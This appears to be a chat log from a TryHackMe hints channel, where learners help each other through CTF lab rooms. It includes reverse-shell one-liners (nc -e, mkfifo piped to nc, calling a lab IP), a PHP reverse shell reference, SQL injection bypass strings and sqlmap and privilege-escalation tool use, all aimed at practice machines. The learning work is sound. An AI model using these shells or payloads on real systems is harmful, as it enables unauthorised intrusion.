@still lintel just uploaded php file with shell

dm me the php script

'uname -a; w; id; /bin/sh -i';

'uname -a; w; id; /bin/bash -i';

try that?

remove the w;

and yes

the w:

ok, try with that

Thanks, I'll keep trying to gain access then. I think I'm close and just missing a step

@still lintel still the same

or even worse, becouse right now automaticaly exits from shell

Just take w; like @stuck fractal said

its without w;

How you passing the shell?

https://github.com/pentestmonkey/php-reverse-shell

just set up the value

How are you triggering the shell?

from burp

I need HEADER to bypass ip filter

Ahh ok

maybe I'll try with curl

nc+-e+/bin/sh+your IP+your port

Tried a netcat shell?

yup

tried form here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Mkfifo

Tried that

If you mean this one:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.1.224 8888 >/tmp/f

doesnt work too

the one you had before was immediately exiting cuz you were trying to spawn a bash shell on a system that doesnt have bash

At the first time I tried with sh

and what was the error

sh: w: not found

remove w;

I removed

I'm stuck on mr robot.

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

I'm doing 25daysofchristmas, day 10 (task 15)
I got inside the webserver using metasploit and got the creds to do the rest of the task, but didn't find the flag1
there is a directory ||/flag-dir|| but it's empty

I'm in the machine as ||daemon|| and I have the username and password for ||robot|| I'm just a bit confused as how to login as ||robot||

Not sure if that needs spoilers or not

it can stay with spoilers

have you tried anything for getting to robot?

Tried su, but it says that it needs to be in a terminal

research into getting a tty shell

then you should be golden 🙂

ooo thank you!!

not a problem

You were right, once I looked that up, the rest of the challenge was easier to do.

guess I found my flag

Anybody has a hint for internal?

Sure. You can DM me.

Hello, I am stuck on the set cookie problem in the web room. I submit this and it looks like it should work but I'm getting the error that my cookie isn't named correctly

In Web Fundamentals?

flagpls

rofl

thank you /shame

👍

anyone is up ?

Please just ask your question 🙂

need help for this room https://tryhackme.com/room/introtonetworking task 4 #6

Have you checked the hint on the question?

ye

It's in the task text if you re-read that

It's asking about TCP so jump to that part

got it thx 🙂 i'm just blind ^^

🙄

Room internal hints on how to ||break out of the Docker container||

Warmup only mayor gives out hints on internal.

@patent token sorry for the ping someone needs hint for ur new room 🙃

@white salmon please avoid from giving hints on newly released rooms :)
@trim haven im sorry..if its to much spoiler remove the comment

No problem :)

hey guys, anyone know how to use wfuzz with 3 payloads such that the first 2 are a product and the last payload just iterates?

is it a room? @flint pebble

its not

this is for thm room hint

Read the channel description

pls go #general

ye my bad sorry lads

np 🙃

Thanks to @patent token for Relevant room. It was a good way to exploit vulns differently and manually 🙏🏻🙏🏻🙏🏻

You're welcome! Glad you enjoyed it.

Any hint for the Wonderland room? About the privilege escalation challenge. Many thanks 😩

@mossy ermine check pins

@mossy ermine check pins
@final mortar Ok, I'm trying to understand ahaha

Hello there, iam having some trouble in the room ZTH: Obscure Web Vulns in the task 14. Cant really find the public key. I would appreciate any tip

hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..

Are we allowed hints on Spring Room yet?

Spoilers.

@languid citrus

sorry @oblique cliff

It's not there.

flag2 for the BLue room task 5

I've reset multiple times. IS that the key, just keep resetting until it shows?

Yes

ok

jobs

the walkthru says to getsystem for the hash capture. Do we need to do that for the flag2?

No

ty

@final mortar May I dm you?

Yes

need help room Kenobi! Task4 #4 after doing the nc 10.10.131.16 21 to the server and copying ssh/id_rsa, next step is to mount the var directory. if i try to mount it: mount 10.10.131.16:/var NFS
nothing shows, it just hangs like that

any idea why ?

try it as root

i found it that it made a NFS folder and inside is tmp/id_rsa but if try cp tmp/id_rsa . it gives cp: cannot create regular file './id_rsa': Read-only file system

is that because of my machine or is there some trick ?

try something other than cp

you could try to cat the file

Im on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesnt seem possible. Am I heading in the wrong direction?

@broken osprey wait I was thinking about another one

this 👇

Im on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesnt seem possible. Am I heading in the wrong direction?
@broken osprey look for out of place files owned by different users

the only file that isnt like the others is the .sudo_as_admin file but I cant do anything with it

im just gonna have to take a break been at it too long

Hi, im currently doing Nmap right now, first answer was -h in the nmap but whenever im using -h i the nmap prgram it says command not found. do i need to use it some other way?

Can you show a screenshot please

im going to give you guys alot to do sadly,

You didn't run nmap with it

oh right

Nmap -h

Are we allowed hints on Spring Room yet?
@ebon ferry yes, feel free to ask

hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..
@oblique shuttle you should find 3 ports, higher 2 takes some time to initialize

anyone done Ra2 room?

anyone can give me a sanity check on Relevant root?

@lusty wigeon please can I PM

sure

@still lintel think it's eluding many of us im afraid

lol mind if I DM you?

not sure i canhelp much but

come at me bro ?

😄

@hot skiff or @severe wave are we still hintless for Ra2_v2 ? cos im loosing what little hair i have left, and i think @still lintel is going even crazier 😮 #plzandthnks

😄

Popo145 what is your question?

Spoiler tagsssssss 😦

@orchid fossil https://github.com/dievus

Hey ppl, any hints on the last question for ZTH: Web 2 ? Got stuck on some process

I have a compiled version of it in one of my repos.

||I uploaded PrinterSpoofer.exe via smb share but executing it gives me nothing at all. I tried executing it via impacket smbserver but to no avail as well. I compiled PrinterSpoofer.exe using VS 2019 and transferred it over to my parrotOS vm.||

alright ill check it out thanks!

am i doing this spoiler tag thing correctly? sorry im new here

It's fine.

You got it.

@patent token It worked. Thanks for the help and the box.

You're welcome. I hope you were able to learn from it. 🙂

I don't know where to go further with the room "uopeasy". I did some enumerating, got some ports, accessed those web pages, did directory scans of all of them, and now I'm kinda stuck on going further

"You should have found some additional pages on different ports. What service does the site most likely use for this page?"

I said apache, then httpd

You mean you stuck on this question right

Yeah basically

It's about the db

I too stuck for long

I know there's a phpmyadmin login page

The DB used

I mean the common one

hmm

Well, i am doing some Fuzzing in some parameters on the last question in ZTH: Web 2 but no success. Any clues for that ?

Ay

Oops

Yup

Exactly

Hmm, SQL injection..ugh I forgot how to do this, I remember trying it years ago

Payloadallthings and sqlmap all the way

"Try and return 1 on the page by entering certain characters into the form."

Which page though?

Just dirbust you will get

Form

I use gobuster

On port 80?

80, 443 and 8080

Have all the useful dirs on my browser

Hmm strange

I also found a login.php using nikto but that wouldnt help now

That only

Buddy

Didn't you get a login form

I have a phpmyadmin login, wordpress login, and empty login.php

I say empty its just a user and pass box

@dusky osprey this may help you https://www.youtube.com/watch?v=TjRK3aVEC60

That's all you need

Try parameters in form

The user and pass one

Ah I get it I think

I mean sqli type

I put 1 and ' and it returned 0,

You should try basic auth bypass

Using burpsuite?

No need just try 1=1 thing

I tried 1=1# and it returned 0 too

' OR 1 = 1--

Hmm strange
Once put it in sqlmap too and see

I'm doing that now

Sqlmap spitted out a .csv file w/

Target URL,Place,Parameter,Technique(s),Note(s)
http://************/login.php,POST,user,T,

Did sqlmap show injection then you can -dbs to see the tables

And dump it

Hi @white salmon Where are you stuck? Just DM.

Did sqlmap show injection then you can -dbs to see the tables
@lime needle I tried doing that but it didn't identify anything

Here's what I got so far.

A phpmyadmin login page, a wordpress login page, a {ip}/login.php page, and the exact wordpress site on ports 443 and 8080

for the {ip}/login.php page, it found a blind sql injection

And that's about it so far

Hi! how r u? im at haskhell room

Please,
What flag numbers all output lines? It has to be cat -nb filename

and i upload kind of a shell but i dont know if im using the right path to call it and im gettint a 500 error

and having a 500 error is like, im not executing a haskell file?

@here I'm having some issues executing a python exploit on my machine keep getting errors anyone offer some fresh eyes?

Hey, I answered you in #room-help. I really recommend directly asking your question, then people know if they can help or not. They will help if they can, but they need to know the question first. @proven seal

and having a 500 error is like, im not executing a haskell file?
@grand pivot you shouldn’t need to visit anywhere. The webpage tells you that it’ll compile and execute upon submission

@proven seal you also don’t have the ability to @here and the fact that you’d try to notify everyone in this channel just to get your question answered is a bit selfish

@oblique cliff right but im getting the 500 error

that... is strange. Im just executing a .hs extension file

Is the Haskell code you provided compile-able?

mmm lets see, i didnt check

We’re you able to upload anything before?

Or is it everything you’ve tried to upload

i tried a .php file before

It tells you the valid types of files to upload

It tells you exactly what it does

but when i'd get an error i just asume that for the text that i should upload haskell file

Good assumption

yeah but you know, i wanted to try

Good thought. Ok so have you been able to get any Haskell file to run properly?

no, i dont yet

first im going to try to compile the file

It does it for you. Why don’t you find some Haskell file online that you know will work if it’s actually doing what it claims?

Then once you have confirmation you can create your own?

i created my own

i get an error, i forgot one letter haha

damn

i tried just making a ls -l

great!! now it works, i did not spell the coMMand correctly

thank you

lol in the XSS Playground room there was a link in the credits to check, Im trying to access it and I get this:

tought it was some joke about javascript and turned it off on my browser

also tried with curl

nevermind I think I know what is happening

anyone can give hint on XSS playground?
I have reached task5 and got stuck, in DOM based XSS q2 alert works with onerror but not with onhover

I tried multiple times still same issue while performing payload with onerro it accept and shows me output without flag. but onhover does not work

is it bug or I'm missing something ?

it's not a bug- you probably have the right payload

you might be making the javascript call wrong

there's something a bit off on that question with the onhover. read through my writeup on that section

I was totally about to give up 😂

I really dont see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day

thanks @4ngryb34r ad @white salmon

I really dont see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day
@broken osprey users typically create files in their own homedir

the binaries? those are the only thing I see sticking out but dont know what they have to do with anything other than the tasks

Not the binaries

There's a file belonging to one of the users that's very much not in their home directory

That's suspicious

ls -al

lol

whoops

hoho! one small step

@stuck fractal thanks for those hints, I have now finally completed the room

Honestly it's a big step up in difficulty

hello i want to use winpeas in windows metepreter but it only says process created. I cant see winpeas execute how can i fix this?
[11:08 AM]
it ony shows this meterpreter > execute -f winPEASany.exe
Process 3084 created.

And that's about it so far
@dusky osprey
Dump the DB and login to wp

Is it allow to ask springs room ?

Is it allow to ask springs room ?
@sick sun yes

Hello, currently in Network Services room and stuck on Enumerating Telnet task #7, how am I to enumerate usernames on this box with Telnet?

It tells you what command to use

it does?

Try looking closely at the nmap scan @main creek

this is the result of my nmap scan

im either blind or just completely missing something

It should show up. Anyways you can get this username later too, if you continue on with exploiting telnet

Just try to connect to telnet and you will have the answer

hmm ok

I mean I can telnet into the box

and you don't see a potential username ?

I dont see anything

one sec

thats all i see

That's officially weird

So you also can't answer #7.2 ?

well thats the response i get

so no, i can't answer 7.2

Restart the box

ok, will try.

hello @everyone I need some help with 'Frequency Analysis'

Crypto Funhouse room, I tried to replace all the letters from the cipher with the english alphabet, did not get anything out, tried to match is as close, but still the same issue

ahm sorry i dont know about the room, but isn't frequency analysis about counting the most used word and then comparing to the most famous word in the original alphabet?

yes exactly that's what frequency analysis about

ah ok so you did that

my bad then idk

yes I did that and it did not give me anything

I did the permutation between the most frequent letters in the cipher with the most in english alphabet

I'm trying to solve Simple CTF room, can someone help me with that

Sure, ask away

I did nmap scan for vulns, can't find anything useful..

Trying to bruteforce with hydra.. as the hint says to use best110.txt

Try dirbusting ?

Yeah, dirbuster is currently running

@quiet hound scan with the -p-

Yeah, dirbuster is currently running
@quiet hound Wait for it 🙂

nmap will scan for the first 1000, and there might be an interesting service running on a random high port

@final mortar have you (by chance) solved the 'cypto fun house' room?

@chrome heron I totally forgot about that.. Thanks you so much for the help. I'll try scanning all the ports and futher update

Let me check real quick

@chrome heron I totally forgot about that.. Thanks you so much for the help. I'll try scanning all the ports and futher update
@quiet hound Yeah you will need the -p- flag, just not at this stage

@final mortar waiting here

@quiet hound sure

That's a no, sorry

I don't even know where to start in "Git Happens" lol. Is it appropriate to ask for it(s?) hints yet?

I haven't done that

try the .git directory